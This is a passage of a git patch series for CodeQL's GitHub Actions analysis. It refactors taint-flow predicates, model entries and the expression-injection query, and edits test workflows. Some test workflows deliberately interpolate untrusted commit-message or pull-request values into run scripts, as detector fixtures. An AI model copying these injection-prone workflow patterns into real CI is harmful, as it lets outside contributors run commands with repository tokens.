+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, TFieldContent { + private string name; + + FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. */ + string getName() { result = name } + + override string toString() { result = name } } diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml index a3f687a0611c..3cd0871c8831 100644 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ b/ql/lib/ext/tj-actions-changed-files.model.yml @@ -3,26 +3,26 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unmerged_files", "*", "PR changed files" ] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 6860f091d5e6..4b47a154a1d8 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or - sinkNode(this, "expression-injection") + externallyDefinedSink(this, "expression-injection") } } @@ -37,5 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + " }}, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml deleted file mode 100644 index 11a101cef491..000000000000 --- a/ql/src/test/.github/workflows/ci-cleanup.yml +++ /dev/null @@ -1,47 +0,0 @@ -run-name: Cleanup ${{ github.head_ref }} -on: - pull_request_target: - types: labeled - paths: - - "images/**" - -jobs: - clean_ci: - name: Clean CI runs - runs-on: ubuntu-latest - permissions: - actions: write - steps: - - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - shell: pwsh - run: | - $startDate = Get-Date -UFormat %s - $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") - while ($true) { - $continue = $false - foreach ($wf in $workflows) { - $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" - $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } - $skippedIds | ForEach-Object { - $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" - Invoke-Expression -Command $deleteCommand - } - $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" - $pending = Invoke-Expression -Command $pendingCommand - if ($pending -gt 0) { - Write-Host "Pending for ${wf}.yml: $pending run(s)" - $continue = $true - } - } - if ($continue -eq $false) { - Write-Host "All done, exiting" - break - } - $curDate = Get-Date -UFormat %s - if (($curDate - $startDate) -gt 60) { - Write-Host "Reached timeout, exiting" - break - } - Write-Host "Waiting 5 seconds..." - Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 6239f0490d13..9ebb7bbf2bea 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -14,35 +14,39 @@ jobs: - name: Extract and Clean Initial URL id: extract-url + env: + BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') echo "Cleaned Initial URL: $INITIAL_URL" echo "::set-output name=initial_url::$INITIAL_URL" - name: Get Redirected URL with Debugging id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") echo "Curl Command Executed" echo "Redirected URL: $REDIRECTED_URL" echo "::set-output name=redirected_url::$REDIRECTED_URL" - name: Trim URL after PNG id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') echo "Trimmed URL: $TRIMMED_URL" echo "::set-output name=trimmed_url::$TRIMMED_URL" - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | - COMMENT_URL="${{ github.event.comment.url }}" NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') @@ -51,5 +55,3 @@ jobs: -H "Accept: application/vnd.github.v3+json" \ "${COMMENT_URL}" \ -d "$PAYLOAD" - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml deleted file mode 100644 index 01d332492519..000000000000 --- a/ql/src/test/.github/workflows/image_link_generator_2.yml +++ /dev/null @@ -1,61 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: extract-url - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: curl - env: - INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} - run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - - - name: Trim URL after PNG - id: trim-url - env: - REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} - run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" - - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} - run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml deleted file mode 100644 index 70aece4f7cff..000000000000 --- a/ql/src/test/.github/workflows/image_link_generator_3.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: source - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: sink - run: | - echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/.github/workflows/inter1.yml b/ql/src/test/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter1.yml rename to ql/src/test/.github/workflows/inter-job.yml diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/src/test/.github/workflows/simple1.yml index f61e763f1881..94e8be89bdc6 100644 --- a/ql/src/test/.github/workflows/simple1.yml +++ b/ql/src/test/.github/workflows/simple1.yml @@ -5,12 +5,15 @@ jobs: runs-on: ubuntu-latest steps: - - id: source + - id: summary uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - - id: sink + - id: flow run: | - echo "${{steps.source.outputs.value}}" + echo "${{steps.summary.outputs.value}}" + - id: no-flow + run: | + echo "${{steps.summary.outputs.foo}}" diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index f3d79b97bc2d..b40f5eb6ac05 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -33,4 +33,10 @@ jobs: echo "$file was changed" done + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done diff --git a/ql/src/test/.github/workflows/test.yml b/ql/src/test/.github/workflows/test.yml index 554a09f21059..628b6e6f1bf5 100644 --- a/ql/src/test/.github/workflows/test.yml +++ b/ql/src/test/.github/workflows/test.yml @@ -22,7 +22,9 @@ jobs: run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 - run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + env: + MSG: ${{steps.step1.outputs.MSG}} + run: echo "test=$MSG" >> "$GITHUB_OUTPUT" job2: runs-on: ubuntu-latest @@ -32,5 +34,4 @@ jobs: needs: job1 steps: - - env: - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs.job_output}} From ebaac5f5cb16ec9aba60e2fdc75bba13b08811ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:03:11 +0100 Subject: [PATCH 030/707] fix: enforce input,output,env prefixes in MaD --- .../codeql/actions/dataflow/ExternalFlow.qll | 26 +++++++++++-------- ql/lib/ext/PLACEHOLDER.model.yml | 7 +++++ .../frabert_replace-string-action.model.yml | 4 +-- ..._actions-find-and-replace-string.model.yml | 4 +-- 4 files changed, 26 insertions(+), 15 deletions(-) create mode 100644 ql/lib/ext/PLACEHOLDER.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 38b964110c73..6446fbb55728 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -50,22 +50,22 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") - then - // 'output.' is the default qualifier - source.asExpr() = uses + then source.asExpr() = uses else none() ) and sourceType = kind ) } -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate externallyDefinedStoreStep( + DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +) { exists(UsesExpr uses, string action, string version, string input, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and summaryModel(action, version, input, output, "taint") and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -74,10 +74,11 @@ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, Dat ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + if input.trim().matches("input.%") + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and succ.asExpr() = uses ) @@ -87,8 +88,11 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) - else sink.asExpr() = uses.getArgumentExpr(input.trim()) + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + else + if input.trim().matches("input.%") + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and sinkModel(action, version, input, kind) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml new file mode 100644 index 000000000000..ef916067967d --- /dev/null +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - ["","","",""] + diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e4..79fd5c76e4ae 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e2..332527813a41 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] From 494fb2470e1c399699b4dab1176ac573f9947ac2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:05:13 +0100 Subject: [PATCH 031/707] fix: refactor local, read and store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 74 ++++++------------- 2 files changed, 22 insertions(+), 54 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9def461900eb..faa7c4c3ebeb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -40,7 +40,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 55fda0387894..045910ed6760 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() } /** @@ -188,11 +188,12 @@ class ArgumentPosition extends string { predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } /** - * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself - * But only for those cases where the step output is defined externally in a MaD specification. - * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access - * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. - * e.g. ${{ steps.step1.output.foo }} + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(StepStmt astFrom, StepsCtxAccessExpr astTo | @@ -204,19 +205,6 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } -/** - * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} - */ -predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, CtxAccessExpr astTo | - astFrom = nodeFrom.asExpr() and - astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom and - (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) - ) -} - /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -252,7 +240,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or - jobsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } @@ -272,17 +259,12 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } -/** - * A read step to read the value of a ReusableWork uses step and connect it to its - * corresponding JobOutputAccessExpr - */ -predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { - exists(NeedsCtxAccessExpr expr, string fieldName | - expr.usesReusableWorkflow() and - expr.getRefExpr() = node1.asExpr() and - expr.getFieldName() = fieldName and - expr = node2.asExpr() and - c = any(FieldContent ct | ct.getName() = fieldName) +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(CtxAccessExpr access | + (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access ) } @@ -291,24 +273,14 @@ predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { - // TODO: Extract to its own predicate - exists(StepsCtxAccessExpr access | - c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and - node2.asExpr() = access - ) - or - reusableWorkflowReturnReadStep(node1, node2, c) -} +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * A store step to store an output expression (node1) into its OutputsStm node (node2) * with a given access path (fieldName) */ -predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { - exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | - out = stmt.getOutputsStmt() and +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(OutputsStmt out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) @@ -321,13 +293,9 @@ predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) * contains the value of `node1`. */ predicate storeStep(Node node1, ContentSet c, Node node2) { - reusableWorkflowReturnStoreStep(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - externallyDefinedSummary(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - runEnvToScriptstep(node1, node2, c) + fieldStoreStep(node1, node2, c) or + externallyDefinedStoreStep(node1, node2, c) or + runEnvToScriptStoreStep(node1, node2, c) } /** From 90d1ae4a05208f1b6a7c1b16f860e72b232288c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:06:28 +0100 Subject: [PATCH 032/707] fix: simplify Ast --- ql/lib/codeql/actions/Ast.qll | 30 +++---------------- .../actions/controlflow/internal/Cfg.qll | 6 +--- 2 files changed, 5 insertions(+), 31 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 087b7f19e626..e5f9e35a4a9b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -149,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -166,28 +166,6 @@ class JobStmt extends Statement instanceof Actions::Job { } } -/** - * Declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ -class JobOutputStmt extends Statement instanceof YamlMapping { - JobStmt job; - - JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - - YamlMapping asYamlMapping() { result = this } - - /** - * Gets a specific value expression - * eg: ${steps.foo.bar} - */ - Expression getOutputExpr(string id) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) - } -} - /** * A Step is a single task that can be executed as part of a job. */ @@ -435,9 +413,9 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result or - // jobs calling reusable workflows + // reusable workflow calling jobs job.getUsesExpr() = result ) } @@ -464,7 +442,7 @@ class JobsCtxAccessExpr extends CtxAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8d044c827a28..8808fb0afe53 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -231,7 +231,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { rank[i](Expression child, Location l | ( child = super.getAStepStmt() or - child = super.getOutputStmt() or + child = super.getOutputsStmt() or child = super.getUsesExpr() ) and l = child.getLocation() @@ -243,10 +243,6 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { - override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } -} - private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { override ControlFlowTree getChildNode(int i) { result = From f65587e5cfa8b9d00dcb91d98df4a720bcc384a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 17:08:13 +0100 Subject: [PATCH 033/707] feat(fieldflow): Refactor flow through Job outputs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Job output should flow to the “key†(YamlString) and be read from there from the JobOutputAccessExpr. - NeedsCtxAccessExpr.getRefExpr should point to the UsesExpr(RW calling Job) or to the OutputsStmt(Regular Job). - JobsCtxAccessExpr.getRefExpr should point to the OutputsStmt(Regular Job). - Create storeStep 